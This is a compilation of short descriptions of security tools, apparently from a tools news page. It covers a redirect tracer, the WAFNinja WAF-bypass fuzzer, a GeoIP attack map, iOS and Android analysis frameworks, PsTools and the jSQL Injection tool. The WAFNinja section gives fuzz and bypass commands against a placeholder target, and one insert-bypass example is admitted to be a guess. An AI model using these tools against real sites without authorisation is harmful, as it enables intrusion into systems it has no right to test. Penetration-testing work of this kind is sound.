It shows all the hops that a URL you specify makes to reach its endpoint, for example to trace the entire trip of a URL from an email or of a shortened URL. Hoper returns all of the URL redirections.

                      Installation
                      $ gem install hoper

                      Usage
                      Type in your command line:
                      $ hoper [url]

                      Development
                      After checking out the repo, run bin/setup to install dependencies. You can also run bin/console for an interactive prompt that will allow you to experiment.
                      To install this gem onto your local machine, run bundle exec rake install . To release a new version, update the version number in version.rb , and then run bundle exec rake release , which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org .


                      WAFNinja - Penetration testers favorite for WAF Bypassing


WAFNinja is a CLI tool written in Python. It helps penetration testers bypass a WAF by automating the steps necessary for bypassing input validation. The tool was created with the objective of being easily extendible, simple to use, and usable in a team environment. Many payloads and fuzzing strings, stored in a local database file, ship with the tool. WAFNinja supports HTTP connections, GET and POST requests, and the use of Cookies in order to access pages restricted to authenticated users. Also, an intercepting proxy can be set up.

                      Usage:
                      wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} ...
                      EXAMPLE:
                      fuzz:
                      python wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ" 
                      -c "phpsessid=value" -t xss -o output.html
                      bypass:
                      python wafninja.py bypass -u "http://www.target.com/index.php"  -p "Name=PAYLOAD&Submit=Submit"         
                      -c "phpsessid=value" -t xss -o output.html
                      insert-fuzz:
                      python wafninja.py insert-fuzz -i select -e select -t sql
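The remaining functions follow the same pattern. For example (sketches inferred from the argument descriptions below; the exact flags for insert-bypass are an assumption, not verified against the tool):
insert-bypass:
python wafninja.py insert-bypass -i "payload" -t xss
set-db:
python wafninja.py set-db new_db.db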
                      positional arguments: {fuzz, bypass, insert-fuzz, insert-bypass, set-db}
                      Which function do you want to use?

                      fuzz check which symbols and keywords are allowed by the WAF.
                      bypass sends payloads from the database to the target.
                      insert-fuzz add a fuzzing string
                      insert-bypass add a payload to the bypass list
                      set-db use another database file. Useful to share the same database with others.

                      optional arguments:
                      -h, --help show this help message and exit
                      -v, --version show program's version number and exit
                      I would appreciate any feedback! Cheers, Khalil.


                      geoip-attack-map - Cyber Security GeoIP Attack Map Visualization


                      This geoip attack map visualizer was developed to display network attacks on your organization in real time. The data server follows a syslog file, and parses out source IP, destination IP, source port, and destination port. Protocols are determined via common ports, and the visualizations vary in color based on protocol type. CLICK HERE for a demo video. This project would not be possible if it weren't for Sam Cappella, who created a cyber defense competition network traffic visualizer for the 2015 Palmetto Cyber Defense Competition. I mainly used his code as a reference, but I did borrow a few functions while creating the display server, and visual aspects of the webapp. I would also like to give special thanks to Dylan Madisetti as well for giving me advice about certain aspects of my implementation.

                      Important
                      This program relies entirely on syslog, and because all appliances format logs differently, you will need to customize the log parsing function(s). If your organization uses a security information and event management system (SIEM), it can probably normalize logs to save you a ton of time writing regex. 1. Send all syslog to SIEM. 2. Use SIEM to normalize logs. 3. Send normalized logs to the box (any Linux machine running syslog-ng will work) running this software so the data server can parse them.
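As a rough sketch of what such a customization could look like, the following hypothetical parser handles iptables-style syslog lines; the real parsing functions live in the data server and must be rewritten to match your own log format:
import re

# Hypothetical format: "... SRC=1.2.3.4 DST=5.6.7.8 ... SPT=1234 DPT=80 ..."
PATTERN = re.compile(r'SRC=(\S+) DST=(\S+) .*?SPT=(\d+) DPT=(\d+)')

def parse_line(line):
    """Return (src_ip, dst_ip, src_port, dst_port), or None when the line doesn't match."""
    match = PATTERN.search(line)
    if match is None:
        return None
    src_ip, dst_ip, spt, dpt = match.groups()
    return src_ip, dst_ip, int(spt), int(dpt)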

                      Installation
                      Run the following commands to install all required dependencies (tested on Ubuntu 14.04 x64)
                      # sudo apt-get install python3-pip redis-server
                      # sudo pip3 install tornado tornado-redis redis maxminddb

                      Setup
1. In /etc/redis/redis.conf, change bind 127.0.0.1 to bind 0.0.0.0 if you plan on running the DataServer on a different machine than the AttackMapServer.
                      2. Make sure that the WebSocket address in /AttackMapServer/index.html points back to the IP address of the AttackMapServer so the browser knows the address of the WebSocket.
3. Download the MaxMind GeoLite2 database, and change the db_path variable in DataServer.py to wherever you store the database.
                        • ./db-dl.sh
                      4. Add headquarters latitude/longitude to hqLatLng variable in index.html
                      5. Use syslog-gen.sh to simulate dummy traffic "out of the box."
                      6. IMPORTANT: Remember, this code will only run correctly in a production environment after personalizing the parsing functions. The default parsing function is only written to parse ./syslog-gen.sh traffic.



                      hget - Rocket Fast, Interruptable, Resumable Download Accelerator

Rocket fast download accelerator written in Golang. The program currently works on Unix systems only.
NOTE: hget is under heavy development; its usage, architecture, and code may change at any time in the future. It would be great if you could contribute whatever features you want to use; I will take a look when I have time.

                      Install
                      $ go get -d github.com/huydx/hget
                      $ cd $GOPATH/src/github.com/huydx/hget
                      $ make clean install
The binary will be built at ./bin/hget; you can copy it to /usr/bin or /usr/local/bin and even alias wget=hget to replace wget totally :P

                      Usage
                      hget [Url] [-n parallel] [-skip-tls false] //to download url, with n connections, and not skip tls certificate
                      hget tasks //get interrupted tasks
                      hget resume [TaskName | URL] //to resume task
To interrupt any in-progress download, just press ctrl-c or ctrl-d in the middle of the download; hget will safely save your data and you will be able to resume later.
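For instance, a typical interrupted-and-resumed session looks like this (the URL is a placeholder):
hget http://example.com/big.iso -n 4
# press ctrl-c mid-download, then later:
hget tasks
hget resume http://example.com/big.iso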



                      needle - The iOS Security Testing Framework


                      Needle is an open source, modular framework to streamline the process of conducting security assessments of iOS apps.

                      Description
Assessing the security of an iOS application typically requires a plethora of tools, each developed for a specific need and all with different modes of operation and syntax. The Android ecosystem has tools like "drozer" that have solved this problem and aim to be a 'one stop shop' for the majority of use cases, however iOS does not have an equivalent.
Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Given its modular approach, Needle is easily extensible and new modules can be added in the form of Python scripts. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections. The only requirement in order to run Needle effectively is a jailbroken device.
                      Needle is open source software, maintained by MWR InfoSecurity .

                      Installation
                      See the Installation Guide in the project Wiki for details.

                      Supported Platforms
                      • Workstation : Needle has been successfully tested on both Kali and OSX
                      • Device : both iOS 8 and 9 are currently supported

                      Usage
                      Usage instructions (for both standard users and contributors) can be found in the project Wiki .
                      A complete walkthrough on how to quickly get up to speed with Needle can be found on the MWR Labs website: https://labs.mwrinfosecurity.com/blog/needle-how-to/


                      CuckooDroid - Automated Android Malware Analysis with Cuckoo Sandbox


CuckooDroid is an extension of Cuckoo Sandbox, the open source software for automating analysis of suspicious files. CuckooDroid brings to Cuckoo the capability of executing and analyzing Android applications.

                      Installation - Easy integration script:
                      git config --global user.email "you@example.com"
                      git config --global user.name "Your Name"
                      git clone --depth=1 https://github.com/cuckoobox/cuckoo.git cuckoo -b 1.2
                      cd cuckoo
                      git remote add droid https://github.com/idanr1986/cuckoo-droid
                      git pull --no-edit -s recursive -X theirs droid master
                      cat conf-extra/processing.conf >> conf/processing.conf
                      cat conf-extra/reporting.conf >> conf/reporting.conf
                      rm -r conf-extra
                      echo "protobuf" >> requirements.txt

                      Documentation
                      You are advised to read the Cuckoo Sandbox documentation before using CuckooDroid!


                      PsTools - Utilities for listing the processes running on remote computers, running processes remotely, rebooting computers, and more



                      The PsTools suite includes command-line utilities for listing the processes running on local or remote computers, running processes remotely, rebooting computers, dumping event logs, and more.


                      Introduction 

                       The Windows NT and Windows 2000 Resource Kits come with a number of command-line tools that help you administer your Windows NT/2K systems. Over time, I've grown a collection of similar tools, including some not included in the Resource Kits. What sets these tools apart is that they all allow you to manage remote systems as well as the local one. The first tool in the suite was PsList, a tool that lets you view detailed information about processes, and the suite is continually growing. The "Ps" prefix in PsList relates to the fact that the standard UNIX process listing command-line tool is named "ps", so I've adopted this prefix for all the tools in order to tie them together into a suite of tools named PsTools.
                      Note: some anti-virus scanners report that one or more of the tools are infected with a "remote admin" virus. None of the PsTools contain viruses, but they have been used by viruses, which is why they trigger virus notifications.
                      The tools included in the PsTools suite, which are downloadable as a package, are:
                      • PsExec - execute processes remotely
                      • PsFile - shows files opened remotely
                      • PsGetSid - display the SID of a computer or a user
                      • PsInfo - list information about a system
                      • PsPing - measure network performance
                      • PsKill - kill processes by name or process ID
                      • PsList - list detailed information about processes
                      • PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
                      • PsLogList - dump event log records
                      • PsPasswd - changes account passwords
                      • PsService - view and control services
                      • PsShutdown - shuts down and optionally reboots a computer
                      • PsSuspend - suspends processes
                      • PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)
                      The PsTools download package includes an HTML help file with complete usage information for all the tools.
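As a taste of how the tools address remote systems, the canonical PsExec example from the Sysinternals documentation launches an interactive command prompt on a remote machine (the computer name is a placeholder):
psexec \\remotecomputer cmd
The other utilities follow the same \\computer convention, with alternate credentials supplied via -u and -p when needed.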

                      jSQL Injection v0.77 - Java application for automatic SQL database injection.


jSQL Injection is a lightweight application used to find database information from a distant server.
It is free, open source and cross-platform (Windows, Linux, Mac OS X).
jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux.

                      Installation
                      Install Java , then download the latest release of jSQL and double-click on the .jar to launch the software.
                      You can also type java -jar jsql-injection-v0.77.jar in your terminal to start the program.


                      Roadmap
                      WAF tamper, HTTP Auth Bruteforce, Translation, SOAP injection, Command line interface, Databases: Access Cassandra MongoDb and Neo4j

                      Change log
                      v0.76 Czech translation, 17 Database flavors: SQLite
                      v0.75 URI injection point, Mavenify, Upgrade to Java 7, Optimized UI
                      v0.73 Authentication: Basic Digest Negotiate NTLM and Kerberos, Database flavor selection
                      v0.7 Scan multiple URLs, Github Issue reporter, 16 Database flavors: Cubrid Derby H2 HSQLDB MariaDB and Teradata, Optimized UI
                      alpha-v0.6 Speed x2: No hex encoding, 10 Database flavors: MySQL Oracle SQLServer PostgreSQL DB2 Firebird Informix Ingres MaxDb and Sybase, JUnit tests, Log4j, Translation
                      0.5 SQL Shell, Uploader
                      0.4 Admin page, Hash bruteforce like MD5 and MySQL, Text encoder/decoder like Base64, Hex and MD5
                      0.3 File injection, Web Shell, Integrated terminal, Configuration backup, Update checker
                      0.2 Algorithm Time, Multi-thread control: Start Pause Resume and Stop, Log URL calls
                      0.0-0.1 Method GET POST Header and Cookie, Algorithm Normal Error and Blind, Best algorithm selection, Progression bars, Simple evasion, Proxy settings, MySQL only

